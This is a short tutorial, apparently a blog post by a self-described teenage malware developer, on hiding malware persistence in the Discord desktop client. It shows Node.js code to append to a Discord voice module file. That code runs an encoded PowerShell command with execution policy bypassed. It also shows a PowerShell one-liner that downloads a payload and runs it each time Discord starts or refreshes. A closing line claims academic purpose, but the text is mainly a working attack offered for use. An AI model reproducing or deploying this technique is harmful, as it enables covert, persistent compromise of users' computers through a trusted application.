Malware Persistence Using Discord

Learn How To Do Malware Persistence Using Discord!
Hello, I’m R00T, a 14-year-old malware developer,
used to coding malware in C++, C# & PowerShell.
Let’s get into the main point!
Malware persistence consists of techniques used to maintain access to systems across restarts.
Common examples are Registry startup entries in Windows or cron jobs in Linux, but these are detected as soon as the victim checks for any startup applications. Today I will explain a sneaky way to do malware persistence on Windows systems.
First of all, I have seen multiple token grabbers (Discord token stealers) that use Discord modules to grab the Discord token. I had been learning Node.js for a while, so I coded a basic dropper in Node.js that will be injected into any Discord module file.
So I chose to work with
C:\Users\MrRoot\AppData\Local\Discord\app-1.0.9004\modules\discord_voice-4\discord_voice\index.js
and append the code to it. The code was basically an exec() call that executes commands, and the command was a one-liner PowerShell dropper with the execution restrictions bypassed.
The dropper was sending a basic message to my webhook.

The code was to check if everything was executed correctly.
The code was:
const { exec } = require("child_process");
exec("powershell -exec bypass -EncodedCommand Base64EncodedPowerShellCommand", (error, stdout, stderr) => {
    if (error) {
        return;
    }
    if (stderr) {
        return;
    }
});
The PowerShell dropper was:
$path = $env:TEMP + "\payload.exe"; Invoke-WebRequest FileLink -Outfile $path;start $path
After appending the code, whenever Discord starts or the user presses Ctrl+R (refreshing Discord), it will load the module, so it will load the malware.
Thanks For Reading!
This Article & Code has been created purely for the purposes of academic research. It is not intended to be used to attack other systems. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.